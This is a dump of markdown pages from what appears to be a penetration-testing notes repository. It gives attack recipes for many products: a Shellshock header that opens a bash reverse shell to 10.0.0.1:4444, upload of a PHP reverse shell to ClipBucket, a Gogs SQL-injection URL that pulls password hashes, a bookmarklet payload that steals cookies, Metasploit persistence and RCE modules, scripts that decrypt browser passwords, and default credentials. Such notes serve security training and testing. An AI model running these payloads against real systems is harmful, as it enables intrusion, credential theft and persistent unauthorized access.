27 | 28 | ## Olevba 29 | 30 | Download the **[Oletools](https://github.com/decalage2/oletools)** to use it. 31 | 32 | ```sh 33 | olevba example.docm 34 | ``` 35 | 36 | Copy the above Visual Basic code, and access to **[OneCompiler](https://onecompiler.com/)**. 37 | Select the programming language "Visual Basic". 38 | Paste the copied code to the editor, then click Run. 39 | 40 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-pyc.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing PYC (Python Compiled File) 3 | description: A PYC file is a compiled file generated from source code written in Python. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-02-18 8 | draft: false 9 | --- 10 | 11 | ## Decompile 12 | 13 | [uncompyle6](https://github.com/rocky/python-uncompyle6/) is a PYC decompiler. 14 | 15 | We can install easily using pip. 16 | 17 | ```bash 18 | pip install uncompyle6 19 | ``` 20 | 21 | Then decompile the pyc file. 22 | 23 | ```bash 24 | uncompyle6 example.pyc 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/shell/_data.yml: -------------------------------------------------------------------------------- 1 | category1: shell 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/shell/reverse-shell-with-pwncat.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reverse Shell with Pwncat 3 | description: Pwncat is a reverse and bind shell handler. 4 | tags: 5 | - Privilege Escalation 6 | - Reverse Shell 7 | - Windows 8 | refs: 9 | date: 2023-12-23 10 | draft: false 11 | --- 12 | 13 | It can be downloaded from [here](https://pwncat.org/). 
To listen for an incoming reverse-shell connection, run the following command.
24 | 25 | ## Commands 26 | 27 | After reverse connecting, we can execute commands either local or remote. 28 | 29 | ```bash 30 | # Switch between Local and Remote shell 31 | Ctrl+D 32 | 33 | # Upload a file to target machine (e.g. upload example.txt from local to remote) 34 | (local) upload ./example.txt /tmp/example.txt 35 | ``` -------------------------------------------------------------------------------- /src/exploit/shell/upgrade-to-fully-interactive-tty.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Upgrade to Fully Interactive TTY 3 | description: After reverse shell, the shell has poorly functions, so we can upgrade to more functional shell. 4 | tags: 5 | - Privilege Escalation 6 | - Reverse Shell 7 | refs: 8 | date: 2023-04-08 9 | draft: false 10 | --- 11 | 12 | ## Upgrade 13 | 14 | After connecting to the target shell with reverse shell, it's recommended to make the shell to be more elegant. 15 | 16 | ```sh 17 | python3 -c 'import pty; pty.spawn("/bin/bash")' 18 | # or 19 | python -c 'import pty; pty.spawn("/bin/bash")' 20 | # or 21 | python2 -c 'import pty; pty.spawn("/bin/bash")' 22 | # or 23 | SHELL=/bin/bash script -q /dev/null 24 | ``` 25 | 26 | The commands below make our shell even more perfect. 
27 | 28 | ```sh 29 | Ctrl+z 30 | stty raw -echo;fg 31 | Enter x2 32 | export TERM=xterm 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/steganography/_data.yml: -------------------------------------------------------------------------------- 1 | category1: steganography 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/steganography/morse-image-reading.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Morse Image Reading 3 | description: If a picture is morse code, we can read it and translate to human readable strings. 4 | tags: 5 | - Steganography 6 | refs: 7 | - https://commons.wikimedia.org/wiki/File:International_Morse_Code.PNG 8 | date: 2023-07-14 9 | draft: false 10 | --- 11 | 12 | ## Morse OCR 13 | 14 | [morse-ocr](https://github.com/eauxfolles/morse-ocr) is an useful Python script to read and translate morse code from picture. 15 | 16 | ```bash 17 | python3 mocr.py example.png 18 | ``` 19 | -------------------------------------------------------------------------------- /src/exploit/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category1: tool 2 | related_menus: 3 | - title: Virtual Machine 4 | id: virtual-machine 5 | - title: Others 6 | id: others -------------------------------------------------------------------------------- /src/exploit/tool/metasploit-cheat-sheets.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Metasploit Cheat Sheets 3 | description: 4 | tags: 5 | - Linux 6 | - Windows 7 | refs: 8 | date: 2023-01-07 9 | draft: false 10 | --- 11 | 12 | ## Msfconsole 13 | 14 | No content yet. 15 | 16 |
17 | 18 | ## Meterpreter 19 | 20 | ```sh 21 | # List all sessions running on background 22 | msf> sessions 23 | 24 | # Start interacting with the session 25 | msf> sessions 26 | 27 | # Drop into a system command shell 28 | meterpreter> shell 29 | # Upgrade to full functional shell 30 | python3 -c 'import pty;pty.spawn("/bin/bash")' 31 | 32 | # Persistence at the target system 33 | # -h: Help 34 | meterpreter> run persistence -h 35 | # -U: Automatically start when the user logs on 36 | # -i: The interal in seconds between each connection attempt 37 | # -p: The port on which the system running Metesploit is listening 38 | # -r: The IP of the system running Metasploit listening for the connect back 39 | meterpreter> run persistence -U -i 5 -p 443 -r 40 | ``` 41 | 42 |
43 | 44 | ## Msfvenom 45 | 46 | No content yet. 47 | -------------------------------------------------------------------------------- /src/exploit/tool/virtual-machine/_data.yml: -------------------------------------------------------------------------------- 1 | category2: virtual-machine -------------------------------------------------------------------------------- /src/exploit/tool/virtual-machine/vm-escape.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: VM (Virtual Machine) Escape 3 | description: 4 | tags: 5 | - Virtual Machine 6 | refs: 7 | date: 2024-05-21 8 | draft: false 9 | --- 10 | 11 | ## Shared Folder 12 | 13 | If the VM admin sets a folder containing sensitive files as Shared Folder, we can get sensitive information by getting into the folder. 14 | 15 | ### VirtualBox 16 | 17 | ```bash 18 | # Linux 19 | cd /media/sf_ 20 | 21 | # Windows 22 | cd \\VBOXSVR\\ 23 | ``` 24 | 25 | ### VMWare 26 | 27 | ```bash 28 | # Linux 29 | cd /mnt/vmhgs/ 30 | 31 | # Windows 32 | cd \\vmware-host\Shared Folder\ 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/version-control/_data.yml: -------------------------------------------------------------------------------- 1 | category1: version_control 2 | related_menus: 3 | - title: Git 4 | id: git -------------------------------------------------------------------------------- /src/exploit/version-control/git/_data.yml: -------------------------------------------------------------------------------- 1 | category2: git -------------------------------------------------------------------------------- /src/exploit/version-control/git/create-git-local-server.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Create Git Local Server 3 | description: 4 | tags: 5 | - Git 6 | refs: 7 | - https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols 8 | date: 
2023-11-05 9 | draft: false 10 | --- 11 | 12 | ## Start Local Git Server (Dumb, HTTP) 13 | 14 | ```bash 15 | cd test_repo 16 | git init 17 | git add . && git commit -m "first commit" 18 | cd .git 19 | # Update auxiliary info file to help dumb server. 20 | # --bare: Bare repository (does not have a working directory) 21 | git --bare update-server-info 22 | cd .. 23 | python3 -m http.server 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/version-control/git/gogs-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gogs Pentesting 3 | description: Gogs (Go Git Service) is a painless self-hosted Git Service. 4 | tags: 5 | - Git 6 | - SQL Injection 7 | - Web 8 | refs: 9 | date: 2023-04-27 10 | draft: false 11 | --- 12 | 13 | ## SQL injection ([CVE-2014-8682](https://www.exploit-db.com/exploits/35238)) 14 | 15 | ```txt 16 | http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- 17 | ``` 18 | 19 | ### Automation 20 | 21 | ```bash 22 | sqlmap -u "https://example.com/api/v1/repos/search?q=test" 23 | sqlmap -u "https://example.com/api/v1/users/search?q=test" 24 | ``` 25 | 26 |
27 | 28 | ## Git Hooks Remote Code Execution (RCE) 29 | 30 | ```bash 31 | msfconsole 32 | msf> use exploit/multi/http/gogs_git_hooks_rce 33 | msf> (set options...) 34 | msf> run 35 | ``` -------------------------------------------------------------------------------- /src/exploit/web/_data.yml: -------------------------------------------------------------------------------- 1 | category1: web 2 | related_menus: 3 | - title: Method 4 | id: method 5 | - title: Security Risk 6 | id: security-risk 7 | - title: Cookie 8 | id: cookie 9 | - title: CMS 10 | id: cms 11 | - title: Framework 12 | id: framework 13 | - title: Template Engine 14 | id: template-engine 15 | - title: API 16 | id: api 17 | - title: Microsoft 18 | id: microsoft 19 | - title: Tool 20 | id: tool 21 | - title: Others 22 | id: others -------------------------------------------------------------------------------- /src/exploit/web/apache-activemq-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Apache ActiveMQ Pentesting 3 | description: Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-23 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```bash 14 | admin:admin 15 | ``` 16 | 17 |
18 | 19 | ## Interaction with MQTT 20 | 21 | If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client. 22 | 23 | ### Subscribe to a Topic 24 | 25 | ```bash 26 | # -h: Host 27 | # -t: Topic name 28 | # -V: MQTT protocol version (5, 31, 311) 29 | mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31 30 | ``` 31 | 32 |
33 | 34 | ## Web Shell by File Upload JSP 35 | 36 | ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file. 37 | 38 | ```bash 39 | msfconsole 40 | msf> use exploit/multi/http/apache_activemq_upload_jsp 41 | msf> set ... 42 | msf> run 43 | meterpreter> shell 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/web/api/_data.yml: -------------------------------------------------------------------------------- 1 | category2: api -------------------------------------------------------------------------------- /src/exploit/web/atlassian-confluence-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Atlassian Confluence Pentesting 3 | description: Atlassian Confluence is a collaboration wiki tool used to help teams to collaborate and share knowledge efficiently. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-11-22 8 | draft: false 9 | --- 10 | 11 | ## Remote Code Execution (CVE-2022-26134) 12 | 13 | Download the exploit from the [repo](https://github.com/h3v0x/CVE-2022-26134). 14 | 15 | ```sh 16 | python3 exploit.py -u http:// -c whoami 17 | ``` 18 | 19 | -------------------------------------------------------------------------------- /src/exploit/web/bookmarklet-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Bookmarklet Attack 3 | description: If attackers can inject arbitrary JavaScript code in target website, they can induce victims to malicious executions with bookmarklet. 4 | tags: 5 | - Web 6 | refs: 7 | - https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/ 8 | date: 2023-06-19 9 | draft: false 10 | --- 11 | 12 | ## Exploitation 13 | 14 | ### Malicious Links 15 | 16 | Attackers induce victims to add their malicious link into the bookmark menu as below. 17 | 18 | ```html 19 |

Drag and drop the following link into the bookmark menu to access easily!

20 | Example.com 21 | ``` 22 | 23 | In addition, if the current website does not set **`HttpOnly`** flag on the **`Set-Cookie`** response header, attackers can get the victim's cookie and send it to the malicious website as below. 24 | 25 | ```html 26 |

Drag and drop the following link into the bookmark menu to access easily!

27 | Example.com 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/web/browser-in-the-browser-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Browser in the Browser (BITB) Attack 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-02 8 | draft: false 9 | --- 10 | 11 | ## Use Templates 12 | 13 | [This repository](https://github.com/mrd0x/BITB) is useful for attacking. -------------------------------------------------------------------------------- /src/exploit/web/cacti-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Cacti Pentesting 3 | description: Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application. 4 | tags: 5 | - Web 6 | refs: 7 | - https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169 8 | date: 2023-05-02 9 | draft: false 10 | --- 11 | 12 | ## Default Credentials 13 | 14 | ```bash 15 | admin:admin 16 | ``` 17 | 18 |
19 | 20 | ## Common Directories 21 | 22 | ```bash 23 | /include/config.php 24 | ``` 25 | 26 |
27 | 28 | ## Remote Code Execution (RCE) CVE-2022-46169 29 | 30 | Reference: [https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/) 31 | 32 | ```bash 33 | msfconsole 34 | msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection 35 | msf> (set options...) 36 | msf> run 37 | ``` 38 | 39 | Also we can refer to [Exploit DB](https://www.exploit-db.com/exploits/51166). -------------------------------------------------------------------------------- /src/exploit/web/cgi-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CGI Pentesting 3 | description: CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Enumeration CGI Scripts 12 | 13 | ```bash 14 | ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txt 15 | ``` 16 | 17 |
18 | 19 | ## Shellshock 20 | 21 | Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands. 22 | If we found the CGI script under **`/cgi-bin/`**, modifying HTTP header to remote code execution. 23 | 24 | ```bash 25 | GET /cgi-bin/example.cgi HTTP/1.1 26 | 27 | User-Agent: () { :; }; /bin/bash -c "sleep 5" 28 | Cookie: () { :; }; /bin/bash -c "sleep 5" 29 | 30 | # Reverse Shell 31 | User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" 32 | ``` -------------------------------------------------------------------------------- /src/exploit/web/clipbucket-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ClipBucket Pentesting 3 | description: ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone). 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-19 8 | draft: false 9 | --- 10 | 11 | ## Arbitrary File Upload < v4.0.0 12 | 13 | ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell. 14 | 15 | ### 1. Prepare Payload 16 | 17 | Create a PHP script to reverse shell in local machine. 18 | 19 | ```bash 20 | cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php 21 | ``` 22 | 23 | Update $ip and $port with your local ip address and port. 24 | 25 | ### 2. Upload the Payload 26 | 27 | Next upload the above PHP script to the target website. 28 | 29 | ```bash 30 | curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php" 31 | ``` 32 | 33 | ### 3. Reverse Shell 34 | 35 | In local machine, start a listener. 36 | 37 | ```bash 38 | nc -lvnp 4444 39 | ``` 40 | 41 | Then access to **`https://example.com/actions/CB_BEATS_UPLOAD_DIR/.php`**. 42 | We should get a shell. 
-------------------------------------------------------------------------------- /src/exploit/web/cms/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cms -------------------------------------------------------------------------------- /src/exploit/web/cms/bolt-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Bolt CMS Pentesting 3 | description: Bolt is an open-source content managemtn system based on PHP. 4 | tags: 5 | - CMS 6 | - Web 7 | refs: 8 | date: 2022-11-22 9 | draft: false 10 | --- 11 | 12 | ## Login Page 13 | 14 | ```sh 15 | /bolt 16 | ``` 17 | 18 |
## Remote Code Execution (v3.7.1, authenticated: the module needs a valid Bolt user, hence the username/password options below)
22 | 23 | ## Version Detection 24 | 25 | Cockpit CMS version is displayed as the value of “data-version” attribute in html tag. 26 | 27 | ```bash 28 | 29 | ``` 30 | 31 |
32 | 33 | ## Common Directories 34 | 35 | ```bash 36 | /auth/check # We can enumerate users using the path 37 | /auth/forgotpassword 38 | /auth/index 39 | /auth/login 40 | /auth/requestreset # We can enumerate users using the path 41 | ``` -------------------------------------------------------------------------------- /src/exploit/web/cms/concrete-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Concrete CMS Pentesting 3 | description: Concrete CMS is a content management system for publishing contents. 4 | tags: 5 | - CMS 6 | - Web 7 | refs: 8 | date: 2023-02-05 9 | draft: false 10 | --- 11 | 12 | ## Default Credentials 13 | 14 | The default username is **“admin”** in Concrete5. -------------------------------------------------------------------------------- /src/exploit/web/cms/fuel-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: FUEL CMS Pentesting 3 | description: FUEL is a content management system (CMS). 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-20 8 | draft: false 9 | --- 10 | 11 | ## Default Credential 12 | 13 | ```txt 14 | admin:admin 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/web/cms/index.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CMS (Content Management System) Pentesting 3 | description: CMS (Content Management System) is computer software used to manage the creation and modification of digital content. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-20 8 | draft: false 9 | --- 10 | 11 | ## CMS Detection 12 | 13 | If you don't know which CMS used in target websites, you can detect it using **[Cmseek](https://github.com/Tuhinshubhra/CMSeeK)** which is an automatic CMS detection tool. 
14 | 15 | ```sh 16 | cmseek -u vulnerable.com 17 | ``` 18 | -------------------------------------------------------------------------------- /src/exploit/web/cms/mara-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Mara CMS Pentesting 3 | description: Mara CMS is a file based content management system. 4 | tags: 5 | - CMS 6 | - Web 7 | refs: 8 | - https://www.exploit-db.com/exploits/48780 9 | date: 2023-03-07 10 | draft: false 11 | --- 12 | 13 | ## Default Credentials 14 | 15 | ```bash 16 | admin:changeme 17 | ``` 18 | 19 |
20 | 21 | ## Remote Code Execution (RCE) v7.5 22 | 23 | Reference: [https://www.exploit-db.com/exploits/48780](https://www.exploit-db.com/exploits/48780) 24 | 25 | ### Automation 26 | 27 | ```bash 28 | msfconsole 29 | msf> use exploit/multi/http/maracms_upload_exec 30 | msf> set rhosts 31 | msf> set lhost 32 | msf> set srvhost 33 | msf> set srvport 34 | msf> set targeturi /path/to/maracms/ 35 | msf> set targeturipath /path/to/maracms/ 36 | ``` 37 | -------------------------------------------------------------------------------- /src/exploit/web/cms/subrion-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Subrion CMS Pentesting 3 | description: Subrion is a content management system (CMS). 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-20 8 | draft: false 9 | --- 10 | 11 | ## File Upload to Reverse Shell (Credential Required) 12 | 13 | ### 1. Download Reverse Shell Payload 14 | 15 | Get the PHP payload from [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell). And change the file extension to **'.phar'**. 16 | Then start a listener. 17 | 18 | ```sh 19 | nc -lvnp 4444 20 | ``` 21 | 22 | ### 2. Upload the Payload in Subrion Panel 23 | 24 | 1. **Login** 25 | 26 | 2. **Move to Content -> Uploads in Panel** 27 | 28 | 3. **Upload reverse-shell.phar** 29 | 30 | 4. **Access to /subrion/upload/reverse-shell.phar** 31 | 32 | Now you get a shell. -------------------------------------------------------------------------------- /src/exploit/web/code-deobfuscation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Code Deobfuscation 3 | description: This technique make a obfuscated code (such as JavaScript) to be understandable. 4 | tags: 5 | - Web 6 | draft: false 7 | --- 8 | 9 | ## Deobfuscation 10 | 11 | - **JavaScript** 12 | 13 | - **[JavaScript Deobfuscator](https://deobfuscate.io/)** 14 | 15 |
16 | 17 | ## Obfuscation 18 | 19 | 1. **JavaScript** 20 | 21 | - **Manual Obfuscation** 22 | 23 | 1. Access [https://obfuscator.io/](https://obfuscator.io/). 24 | 25 | 2. Change “String Array Encoding” to “Base64”. 26 | 27 | 3. Paste JavaScript code. 28 | 29 | 4. Click "Obfuscate". 30 | 31 | 5. Try running it on [https://jsconsole.com/](https://jsconsole.com/). 32 | 33 | - **Use Online Tools** 34 | 35 | - **[JSFuck](http://www.jsfuck.com/)** 36 | 37 | - **[jjencode](https://utf-8.jp/public/jjencode.html)** 38 | 39 | - **[aaencode](https://utf-8.jp/public/aaencode.html)** 40 | -------------------------------------------------------------------------------- /src/exploit/web/codiad-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Codiad Pentesting 3 | description: Codiad is a web-based IDE framework. 4 | tags: 5 | - Web 6 | refs: 7 | - https://www.exploit-db.com/exploits/49705 8 | date: 2023-02-26 9 | draft: false 10 | --- 11 | 12 | ## Default Credentials 13 | 14 | ```sh 15 | # Docker image - https://hub.docker.com/r/bitnami/codiad 16 | user:bitnami 17 | ``` 18 | 19 |
20 | 21 | ## Enumeration 22 | 23 | ```bash 24 | # Get current directory in the system 25 | /components/project/controller.php?action=get_current 26 | ``` 27 | 28 |
29 | 30 | ## Remote Code Execution (RCE) v2.8.4 31 | 32 | ```bash 33 | wget https://www.exploit-db.com/exploits/49705 -O exploit.py 34 | 35 | # Linux 36 | python3 exploit.py https://example.com/ admin admin 4444 linux 37 | # Windows 38 | python3 exploit.py https://example.com/ admin admin 4444 windows 39 | ``` 40 | -------------------------------------------------------------------------------- /src/exploit/web/cookie/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cookie -------------------------------------------------------------------------------- /src/exploit/web/cookie/session-fixation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Session Fixation 3 | description: Session fixation attacks attempt to exploit the vulnerability of a system that allows one person to fixate another person’s session identifier. 4 | tags: 5 | - Cookie 6 | - Web 7 | refs: 8 | - https://owasp.org/www-community/attacks/Session_fixation 9 | date: 2023-04-15 10 | draft: false 11 | --- 12 | 13 | ## Exploitation 14 | 15 | ### 1. Attacker Logins Website to Get the Session 16 | 17 | An attacker need to login to a legitimate website then get the session value. 18 | 19 | ```bash 20 | Cookie: sessid=abcdef 21 | ``` 22 | 23 | ### 2. Attacker Sends the Session Value to Victim 24 | 25 | There are various way to send the attacker’s session value. For example, 26 | 27 | - Send email. 28 | - Predict a session value. 29 | - Eavesdrop a session using packet sniffer such as Wireshark. 30 | - XSS 31 | 32 | ```bash 33 | 34 | ``` 35 | 36 | ### 3. Victim Logins with Attacker’s Session 37 | 38 | If the victim logins and attacker’s session is set to the Cookie, the attacker can control the victim’s account in the website. 
-------------------------------------------------------------------------------- /src/exploit/web/elasticsearch/_data.yml: -------------------------------------------------------------------------------- 1 | category2: elasticsearch -------------------------------------------------------------------------------- /src/exploit/web/elasticsearch/elasticsearch-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Elasticsearch Pentesting 3 | description: It is a search engine based on the Lucene library. Default ports are 9200, 9300. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-12-23 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```txt 14 | admin:elasticadmin 15 | elastic:changeme 16 | ``` 17 | 18 |
19 | 20 | ## Brute Force Credentials 21 | 22 | Crack the "Authorization" header in the web page. 23 | 24 | ```sh 25 | hydra -L usernames.txt -P passwords.txt -s 9200 http-get / 26 | ``` 27 | 28 |
29 | 30 | ## Common Directories 31 | 32 | ```bash 33 | /_cat/ 34 | /_cat/indices 35 | /_cluster/ 36 | /_nodes/ 37 | /_remote/ 38 | /_security 39 | /_search?q=username 40 | /_search?q=password 41 | /_security/role 42 | /_security/user 43 | /_xpack/security/user/ 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/web/elasticsearch/kibana-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Kibana Pentesting 3 | description: A proprietary data visualization dashboard software for Elasticsearch. A default port is 5601. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-12-22 8 | draft: false 9 | --- 10 | 11 | ## Vulnerabilities 12 | 13 | ### Local File Inclusion (LFI) Version \< 6.4.3 & 5.6.13 14 | 15 | ```sh 16 | curl http://:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt 17 | ``` 18 | 19 | ### Remote Code Execution (RCE) Version \< 6.6.0 20 | 21 | Reference: [https://github.com/mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609) 22 | -------------------------------------------------------------------------------- /src/exploit/web/extract-web-browser-passwords.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Extract Web Browser Passwords 3 | description: Browser’s passwords may be retrieve easily if our device is compromised by decrypting login data. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-06-23 8 | draft: false 9 | --- 10 | 11 | ## Firefox 12 | 13 | ```bash 14 | wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py 15 | python3 firefox_decrypt.py 16 | ``` 17 | 18 |
19 | 20 | ## Google Chrome 21 | 22 | ```bash 23 | wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py 24 | python3 decrypt_chrome_password.py 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/web/framework/_data.yml: -------------------------------------------------------------------------------- 1 | category2: framework -------------------------------------------------------------------------------- /src/exploit/web/framework/dotnet/_data.yml: -------------------------------------------------------------------------------- 1 | category3: dotnet -------------------------------------------------------------------------------- /src/exploit/web/framework/dotnet/blazor-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Blazor Pentesting 3 | description: Blazor is a web framework for building interactive web applications using C# instead of JavaScript. 4 | tags: 5 | - .NET 6 | - Web 7 | refs: 8 | date: 2024-11-30 9 | draft: false 10 | --- 11 | 12 | ## Common Directories/Files 13 | 14 | ```bash 15 | # This file contains paths of DLLs that can be reversed. 16 | /_framework/blazor.boot.json 17 | /_framework/.dll 18 | ``` 19 | 20 |
21 | 22 | ## Reverse Engineering DLLs 23 | 24 | We can reverse DLLs such as `/_framework/.dll` using tools such as **DotPeek** for retrieving sensitive information (credentials, software versions, etc.). 25 | 26 | If you use DotPeek, right-click on the name in Assembly Explorer and click **Decompiled Sources** for investigation. -------------------------------------------------------------------------------- /src/exploit/web/framework/java/_data.yml: -------------------------------------------------------------------------------- 1 | category3: java -------------------------------------------------------------------------------- /src/exploit/web/framework/java/ajp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: AJP (Apache JServ Protocol) Pentesting 3 | description: AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009. 4 | tags: 5 | - AJP 6 | - Web 7 | refs: 8 | date: 2022-11-22 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```sh 15 | nmap --script ajp-auth -p 8009 16 | nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 17 | nmap --script ajp-brute -p 8009 18 | nmap --script ajp-headers -p 8009 19 | nmap --script ajp-methods -p 8009 20 | nmap --script ajp-request -p 8009 21 | ``` 22 | 23 |

24 | 25 | ## Ghostcat File Inclusion 26 | 27 | It is a vulnerability in **Tomcat AJP** ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)). 28 | Metasploit can be used to exploit it. 29 | 30 | ```sh 31 | msfconsole 32 | msf6 > use auxiliary/admin/http/tomcat_ghostcat 33 | msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts 34 | msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit 35 | ``` 36 | -------------------------------------------------------------------------------- /src/exploit/web/framework/java/apache-struts-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Apache Struts Pentesting 3 | description: An open-source web application framework for developing Java EE web applications. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-11-22 8 | draft: false 9 | --- 10 | 11 | ## Struts2 OGNL Elavasion 12 | 13 | Metasploit is useful for exploiting this. 14 | 15 | ```sh 16 | msfconsole 17 | msf > use multi/http/struts2_content_type_ognl 18 | msf > set payload linux/x86/meterpreter/reverse_tcp 19 | msf > exploit 20 | 21 | meterpreter > shell 22 | SHELL=/bin/bash script -q /dev/null 23 | ``` -------------------------------------------------------------------------------- /src/exploit/web/framework/javascript/_data.yml: -------------------------------------------------------------------------------- 1 | category3: javascript -------------------------------------------------------------------------------- /src/exploit/web/framework/javascript/angular-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Angular Pentesting 3 | description: AngularJS is a web application framework. 4 | tags: 5 | - SSTI 6 | - Web 7 | refs: 8 | date: 2023-07-12 9 | draft: false 10 | --- 11 | 12 | ## HTML Attributes 13 | 14 | If a website uses the AngularJS framework, its nodes have an “ng-app” attribute, so you can check for it in the HTML source code. 15 | 16 | ```html 17 |
18 | ``` 19 | 20 |
21 | 22 | ## Server-Side Template Injection (SSTI) 23 | 24 | ```bash 25 | {{2*3}} 26 | {{$on.constructor('alert("test")')()}} 27 | {{constructor.constructor('alert("test")')()}} 28 | 29 | 30 |
31 | ``` 32 | 33 | It is worth testing the following variants to bypass sanitization. 34 | 35 | ```bash 36 | # Remove one-pair braces 37 | {2*3} 38 | 39 | # Remove all braces 40 | 2*3 41 | 42 | # Add additional braces 43 | {{{2*3}}} 44 | ``` -------------------------------------------------------------------------------- /src/exploit/web/framework/python/_data.yml: -------------------------------------------------------------------------------- 1 | category3: python -------------------------------------------------------------------------------- /src/exploit/web/framework/python/django-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Django Pentesting 3 | description: Django is a web framework written in Python. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-03-19 8 | draft: false 9 | --- 10 | 11 | ## SSTI (Server-Side Template Injection) 12 | 13 | ```bash 14 | # XSS 15 | {{ `` }} 16 | 17 | # Debug information 18 | {% debug %} 19 | ``` 20 | 21 |

